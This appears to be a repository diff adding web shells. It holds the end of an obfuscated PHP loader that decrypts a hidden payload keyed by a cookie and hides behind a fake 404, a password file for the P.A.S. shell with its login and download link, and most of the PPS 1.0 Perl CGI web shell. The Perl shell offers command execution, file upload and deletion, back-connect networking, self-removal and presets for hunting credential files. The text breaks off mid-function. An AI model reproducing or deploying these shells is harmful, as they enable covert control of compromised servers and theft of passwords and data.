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
EsOvoro=
'));if(isset($_COOKIE['sP']) && $_COOKIE['sP']!==NULL){$g__g_=$_COOKIE['sP'];$g__g_=md5($g__g_).substr(md5(strrev($g__g_)),0,strlen($g__g_));for($g____g_=0;$g____g_<15185;$g____g_++){$g___g_[$g____g_]=chr(( ord($g___g_[$g____g_])-ord($g__g_[$g____g_]))%256);$g__g_.=$g___g_[$g____g_];}if($g___g_=@gzinflate($g___g_)){$g____g_=create_function('',$g___g_);unset($g___g_,$g__g_);$g____g_();}} @header("Status: 404 Not Found"); ?>

21
php/pas/password.txt Normal file

@ -0,0 +1,21 @@
╔══════════════════╗
╔─╣ P.A.S. v.3.0.10 ╠─╗
║ ╚══════════════════╝ ╚───────────────────────────────────────────────╗
║ ║
║ ╔────────────╗ ┌───────────────────────────────────────────────────┐ ║
╠═╣ PASSWORD* ╠─╣ root │ ║
║ ╚────────────╝ └───────────────────────────────────────────────────┘ ║
║ ║
║ ╔────────────╗ ┌───────────────────────────────────────────────────┐ ║
╠═╣ DOWNLOAD ╠─╣ http://profexer.name/pas/download.php │ ║
║ ╚────────────╝ └───────────────────────────────────────────────────┘ ║
║ ║
║ ╔────────────╗ ┌───────────────────────────────────────────────────┐ ║
╠═╣ DiSCUSSiON ╠─╣ https://rdot.org/forum/showthread.php?t=1567 │ ║
║ ╚────────────╝ │ │ ║
║ │ https://exploit.in/forum/index.php?showtopic=68238│ ║
║ 2011-2013 └───────────────────────────────────────────────────┘ ║
╚══════════════════════════════════════════════════════════════════════╝

File diff suppressed because it is too large Load diff

1522
php/wso/wso2.php Normal file

File diff suppressed because it is too large Load diff

7
php/wso/wso2_pack.php Normal file

File diff suppressed because one or more lines are too long

173
pl/pps-pl/pps-v1.0.pl Normal file

@ -0,0 +1,173 @@
#!/usr/bin/perl
#################################################################################
#PPS 1.0 - Perl-cgi web shell by Pashkela [BugTrack Team] © 2010
use Digest::MD5 qw(md5_hex);
$Password = "63a9f0ea7bb98050796b649e85481845";# - root [md5]
$WinNT = 0; # *nix=0,win=1
$CommandTimeoutDuration = 10;# max time of command execution in console in seconds
##################################################################################
$NTCmdSep = "&";
$UnixCmdSep = ";";
$ShowDynamicOutput = 1;
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);$CmdPwd = ($WinNT ? "cd" : "pwd");$PathSep = ($WinNT ? "\\" : "/");$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");$LogFlag = false;use File::Basename;
use MIME::Base64;sub cod($){my $url =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$url=encode_base64($_[0]);return $url;}
sub dec($){ my $url1=decode_base64($_[0]);return $url1;}sub ReadParse {local (*in) = @_ if @_;local ($i, $loc, $key, $val);$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;if($ENV{'REQUEST_METHOD'} eq "GET"){$in = $ENV{'QUERY_STRING'};}elsif($ENV{'REQUEST_METHOD'} eq "POST"){binmode(STDIN) if $MultipartFormData & $WinNT;read(STDIN, $in, $ENV{'CONTENT_LENGTH'});}if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/){$Boundary = '--'.$1; @list = split(/$Boundary/, $in); $HeaderBody = $list[1]; $HeaderBody =~ /\r\n\r\n|\n\n/;$Header = $`;$Body = $';$Body =~ s/\r\n$//;$in{'filedata'} = $Body;$Header =~ /filename=\"(.+)\"/;$in{'f'} = $1;$in{'f'} =~ s/\"//g;$in{'f'} =~ s/\s//g;for($i=2; $list[$i]; $i++){$list[$i] =~ s/^.+name=$//;$list[$i] =~ /\"(\w+)\"/;$key = $1;$val = $';$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;$val =~ s/%(..)/pack("c", hex($1))/ge;$in{$key} = $val;}}else{@in = split(/&/, $in);foreach $i (0 .. $#in){$in[$i] =~ s/\+/ /g;($key, $val) = split(/=/, $in[$i],2);$key =~ s/%(..)/pack("c", hex($1))/ge;$val =~ s/%(..)/pack("c", hex($1))/ge;$in{$key} .= "\0" if (defined($in{$key}));$in{$key} .= $val;}}}sub uname{$s="uname -a";$s.=" -U $q{u}" if($q{u});return $s;}sub hddall{$s='df -k /|sed 1d|awk "{total += \$2} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddfree{$s='df -k /|sed 1d|awk "{total += \$4} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddproc{$s='df -k /| sed 1d | awk "{total += \$5} {print 100-total}"';$s.=" -U $q{u}" if($q{u});return $s;}$hddall=hddall();$hddfree=hddfree();$hddproc=hddproc();sub PH{printf ("%.2f",(@_))};sub id{$s="id";$s.=" -U $q{u}" if($q{u});return $s;}
sub dir_list{my @list=();$CurrentDir=~s!\Q//!/!g;my $dir=$CurrentDir;@list=scan_dir($dir);$id=0;foreach $arg(@list) {$id++;$ii='d'.$id;my $name=fileparse($arg,@suffixlist);if (-d $arg){print '<tr class=l1><th class=chkbx><input type=checkbox class=chkbx></th><td><form method=POST name='.$ii.' action='.$ScriptLocation.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="cd '.$arg.'"><a href="javascript:document.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;<b>[ '.$name.' ]</b></font></a></form></td><td>dir</td><td>'.mtime($arg).'</td>'.owner($arg).'<td><table><td><form name='.$ii.'rt method="POST" action="'.$ScriptLocation.'"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="RT"><input type="hidden" name="fdata" value='.cod(mtime($arg)).'><input type="hidden" name="fchmod" value='.perm($arg).'><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td><td><form method=POST name='.$ii.'z action='.$ScriptLocation.'><input type=hidden name=zip value='.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=zip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST name='.$ii.'uz action='.$ScriptLocation.'><input type=hidden name=unzip_name value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form method=POST name='.$ii.'del action='.$ScriptLocation.'><input type=hidden name=del_dir value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=deldir><a href="javascript:document.'.$ii.'del.submit()">[<font 
color=#FF0000>x</font>]</a></form></td></table/></td></tr>';}else{$size1 = (stat $arg)[7]/1024;if ($size1<1000){$size = sprintf("%.2f",($size1))." KB";}else{$size = sprintf("%.2f",($size1/1024))." MB";}print '<tr class=l1><th class=chkbx><input type=checkbox class=chkbx></th><td><form name='.$ii.' method=post action='.$ScriptLocation.'><input type=hidden name=path id=view value='.$name.'><input type=hidden name=a value=view_file><input type=hidden name=d value='.$CurrentDir.'><a href="javascript:document.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;'.$name.'</font></a></form></td><td>'.$size.'</td><td>'.mtime($arg).'</td>'.owner($arg).'<td><table><td><form name='.$ii.'rt method="POST" action="'.$ScriptLocation.'"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="RT"><input type="hidden" name="fdata" value='.cod(mtime($arg)).'><input type="hidden" name="fchmod" value='.perm($arg).'><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td><td><form name='.$ii.'ed method=post action='.$ScriptLocation.'><input type=hidden name=path id=edit1_file value='.$name.'><input type=hidden name=a value=edit_file_path><input type=hidden name=d value='.$CurrentDir.'><a href="javascript:document.'.$ii.'ed.submit()">E </a></form></td><td><form name='.$ii.'d method="POST" action="'.$ScriptLocation.'"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="download"><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'d.submit()">D </a></form></td><td><form method=POST name='.$ii.'z action='.$ScriptLocation.'><input type=hidden name=zip value='.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=zip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST 
name='.$ii.'uz action='.$ScriptLocation.'><input type=hidden name=unzip_name value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form method=POST name='.$ii.'del action='.$ScriptLocation.'><input type=hidden name=del_file value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=delfile><a href="javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font>]</a></form></td></table></td></tr>';
}}print "</table>";sub perm($){my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);return $mode;}sub owner($){my $uid=(stat $_[0])[4];my $user=(getpwuid $uid)[0];my $uid1=(stat $_[0])[5];my $group=(getgrgid $uid1)[0];my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);if (!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font color=#FF0000>'.$mode.'</font></td>';}elsif(!-w $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font color=#FFFFFF>'.$mode.'</font></td>';}else{return '<td>'.$user.'/'.$group.'</td><td><font color=#25ff00>'.$mode.'</font></td>';}}sub mtime($){my ($seconds, $minutes, $hours, $day, $month, $year, $wday, $yday,$isdst) = localtime((stat($_[0]))[9]);my $mmtime = ($year+1900).'-'.sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02d",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds);return $mmtime;}sub scan_dir{my ($dir)=@_;my @dirs=();my @files=();my @list=();my @file=();for $file (glob($dir.'/.*')){if (-d $file && $file ne $dir.'/.'){push @dirs,$file;}if (-f $file){push @files,$file;}}for $file (glob($dir.'/*')){if (-d $file) {push @dirs,$file;}else{push @files,$file;}}@list=(@dirs,@files);return @list;}}sub HtmlSpecialChars($){my ($st)=@_;$st=~s|<|[<]|g;$st=~s|>|[>]|g;return $st;}sub DeHtmlSpecialChars($){my ($st)=@_;$st=~s|\[<\]|<|g;$st=~s|\[>\]|>|g;return $st;}$uname = uname();$idd = id();sub P{print @_}sub PrintPageHeader{print "Content-type: text/html\n\n";&GetCookies;$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;if ($LoggedIn != 1) {$Password = 0}$EncodedCurrentDir = $CurrentDir;
$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;print <<END;
<html><head><title>PPS 1.0</title>$HtmlMetaHeader<style>body{background-color:#444;color:#e1e1e1;}body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }table.info{ color:#fff;background-color:#222; }span,h1,a{ color: #df5 !important; }span{ font-weight: bolder; }h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }div.content{ padding: 5px;margin-left:5px;background-color:#333; }a{ text-decoration:none; }a:hover{ text-decoration:underline; }.ml1{ border:1px solid#444;padding:5px;margin:0;overflow: auto; }.bigarea{ width:100%;height:250px; }input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; }form{ margin:0px; }#toolsTbl{ text-align:center; }.toolsInp{ width: 300px }.main th{text-align:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-family:Courier,Monospace;}</style></head><body onLoad="document.checkbox.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0"><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Hdd:<br>DateTime:<br>Cwd:</span></td><td><nobr>
END
P("".`$uname`. "");print "</nobr><br>";P("". `$idd` . "");print "<br>";PH("".`$hddall`. "");print " GB <span>Free: </span>";PH("".`$hddfree`. "");print " GB [ ";P("". `$hddproc`);print "% ]";$time=localtime;print "<br>$time<table><td>";my $cwd="";
my @path = split("/", $CurrentDir);my $mode=sprintf("%04o",((stat($CurrentDir))[2])&07777); my $ss=0;print '<table cellpadding=0 cellspacing=0><td><form method=POST action='.$ScriptLocation.' name=cwd0><a href="javascript:document.cwd0.submit()">[..]&nbsp;</a><input type=hidden name=cc value="/"><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="changedir"></form></td>';foreach my $ar(@path){if($ar){$cwd .= "/".$ar;$ss++;print '<td><form method=POST action='.$ScriptLocation.' name=cwd'.$ss.'><a href="javascript:document.cwd'.$ss.'.submit()">/'.$ar.'</a><input type=hidden name=cc value='.$cwd.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="changedir"></form></td>';}}my $fw="<font face=Verdana size=2 color=#FFFFFF>";my $fe="</font>";print "</table>";sub cwdcol{if (!-r $CurrentDir){return '<font color=#FF0000>'.$mode.'</font>';}elsif(!-w $CurrentDir){return '<font color=#FFFFFF>'.$mode.'</font>';}else{return '<font color=#25ff00>'.$mode.'</font>';}}print "<td>".cwdcol()."</td><td><a href=$ScriptLocation> [ home ] </a></td></td></table>";
print <<END;
</td><td width=1 align=right><nobr><span>Server IP:</span><br>$ENV{'SERVER_ADDR'}<br><span>Client IP:</span><br>$ENV{'REMOTE_ADDR'}</nobr></td></tr></table><table width="100%" colspan="1" bgcolor="#222"><td><form method="POST" name=systeminfo action=$ScriptLocation><input type="hidden" name="a" value="systeminfo"><input type=hidden name=d value=$CurrentDir><a href="javascript:document.systeminfo.submit()">$fw [ $fe Sysinfo $fw ] $fe</a></form></td><td><form method=POST name=files action=$ScriptLocation><input type=hidden name=cc value=$CurrentDir><a href="javascript:document.files.submit()">$fw [ $fe Files $fw ] $fe</a><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="cd $CurrentDir"></form></td><td><form method="POST" name=consoler action=$ScriptLocation><input type="hidden" name="a" value="console"><input type="hidden" name="d" value=$CurrentDir><a href="javascript:document.consoler.submit()"> $fw [ $fe Console $fw ] $fe</a></form></td><td><form method="POST" name=sqlman action=$ScriptLocation><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="sql"><a href="javascript:document.sqlman.submit()">$fw [ $fe SQL $fw ] $fe</a></form></td><td><form method="POST" name=backconn action=$ScriptLocation><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="net"><a href="javascript:document.backconn.submit()">$fw [ $fe Network $fw ] $fe</a></form></td><td><form method="POST" name=evalc action=$ScriptLocation><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="code"><a href="javascript:document.evalc.submit()">$fw [ $fe Code $fw ] $fe</a></form></td><td><form method="POST" name=logout action=$ScriptLocation><input type="hidden" name="a" value="logout"><a href="javascript:document.logout.submit()">$fw [ $fe Logout $fw ] $fe</a></form></td><td><form method="POST" name=remove action=$ScriptLocation><input type="hidden" name="a" 
value="remove"><a href="javascript:document.remove.submit()">$fw [ $fe Self remove $fw ] $fe</a></form></td></table></tr></table><font color="#C0C0C0" size="2">
END
}
sub PrintLoginForm{print <<END;
<form name="f" method="POST" action="$ScriptLocation" align="center"><input type="password" name="p"><input type="submit" value="Enter"></form>
END
}
sub PrintPageFooter{print "</font></body></html>";}sub GetCookies{@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});foreach $cookie(@httpcookies){($id, $val) = split(/=/, $cookie);$Cookies{$id} = $val;}}sub PerformLogout{print "Set-Cookie: SAVEDPWD=;\n";print "Content-type: text/html\n\n";&PrintLoginForm;}sub PerformLogin{if(md5_hex($LoginPassword) eq $Password){print "Set-Cookie: SAVEDPWD=".md5_hex($LoginPassword).";\n";&PrintPageHeader("c");file_header();&PrintCommandLineInputForm;&PrintPageFooter;}else{print "Content-type: text/html\n\n";&PrintLoginForm;}}sub FileManager{&PrintPageHeader("f");file_header();&PrintCommandLineInputForm; &PrintPageFooter;}sub PrintCommandLineInputForm{$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";
dir_list();sub wr_cur {if (!-w $CurrentDir){print '<font color=#FF0000>[Not writable]</font>';}else{print '<font color=#25ff00>[Writeable]</font>';}}
print <<END;
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'><tr><td><form method=POST><span>Change dir:</span><br><input class=toolsInp type=text name=cc value=$CurrentDir><input type=submit value='>>'><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="changedir"></form></td><td><form method=POST action=$ScriptLocation><span>Read file:</span><br><input class='toolsInp' type=text name=path><input type=hidden name=a value=view_file><input type=hidden name=d value=$CurrentDir><input type=submit value='>>'></form></td></tr><tr><td><form method=POST action="$ScriptLocation"><span>Make dir:</span>
END
wr_cur();
print <<END;
<br><input class='toolsInp' type=text name=md><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="makedir"><input type=submit value='>>'></form></td><td><form method=POST action="$ScriptLocation"><span>Make file:</span>
END
wr_cur();
print <<END;
<br><input class='toolsInp' type=text name=mf><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="makefile"><input type=submit value='>>'></form></td></tr><tr><td><form name="ff" method="POST" action="$ScriptLocation"><span>Execute:</span><br><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
<td>
END
&PrintFileUploadForm;
print <<END;
</td></table>
END
}
sub PrintFileUploadForm{
print <<END;
<span>Upload file: </span>
END
wr_cur();
print <<END;
<br><form name="upload_file_form" enctype="multipart/form-data" method="POST" action="$ScriptLocation"><input type="file" name="f" class=toolsInp><input type="submit" value=">>"><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="upload"></form>
END
}
sub ConsoleP{
print <<END;
<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'><td><table class=info id=toolsTbl cellpadding=3 cellspacing=3 width=50%><tr><td><form name="run" method="POST" action="$ScriptLocation"><br><span>\$</span><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><input type=text class=toolsInp name=c value=''><input type=submit value=">>"></form></td></tr><tr><tr><td><form name="alias" method="POST" action="$ScriptLocation"><br><span>\$</span><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><select name=aliases class=toolsInp><option value="ls -lha">List dir</option><option value="lsattr -va">list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">show opened ports</option><option value="ps aux">process status</option><optgroup label="-Find-"></optgroup><option value="find / -type f -perm -04000 -ls">find all suid files</option><option value="find . -type f -perm -04000 -ls">find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">find all sgid files</option><option value="find . -type f -perm -02000 -ls">find sgid files in current dir</option><option value="find / -type f -name config.inc.php">find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;">find config* files</option><option value="find . -type f -name &quot;config*&quot;">find config* files in current dir</option><option value="find / -perm -2 -ls">find all writable folders and files</option><option value="find . -perm -2 -ls">find all writable folders and files in current dir</option><option value="find / -type f -name service.pwd">find all service.pwd files</option><option value="find . 
-type f -name service.pwd">find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">find all .htpasswd files</option><option value="find . -type f -name .htpasswd">find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">find all .bash_history files</option><option value="find . -type f -name .bash_history">find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">find .fetchmailrc files in current dir</option><optgroup label="-Locate-"></optgroup><option value="locate httpd.conf">locate httpd.conf files</option><option value="locate vhosts.conf">locate vhosts.conf files</option><option value="locate proftpd.conf">locate proftpd.conf files</option><option value="locate psybnc.conf">locate psybnc.conf files</option><option value="locate my.conf">locate my.conf files</option><option value="locate admin.php">locate admin.php files</option><option value="locate cfg.php">locate cfg.php files</option><option value="locate conf.php">locate conf.php files</option><option value="locate config.dat">locate config.dat files</option><option value="locate config.php">locate config.php files</option><option value="locate config.inc">locate config.inc files</option><option value="locate config.inc.php">locate config.inc.php</option><option value="locate config.default.php">locate config.default.php files</option><option value="locate config">locate config* files </option><option value="locate '.conf'">locate .conf files</option><option value="locate '.pwd'">locate .pwd files</option><option value="locate '.sql'">locate .sql files</option><option value="locate '.htpasswd'">locate .htpasswd files</option><option value="locate '.bash_history'">locate .bash_history files</option><option value="locate '.mysql_history'">locate .mysql_history files</option><option value="locate 
'.fetchmailrc'">locate .fetchmailrc files</option><option value="locate backup">locate backup files</option><option value="locate dump">locate dump files</option><option value="locate priv">locate priv files</option></select><input type=submit value='>>'></form></td></tr></table></td></table>
END
}
sub RTP{my $path=$CurrentDir."/".$TransferFile;print "Path: $path";$Fdata = dec($Fdata);
print <<END;
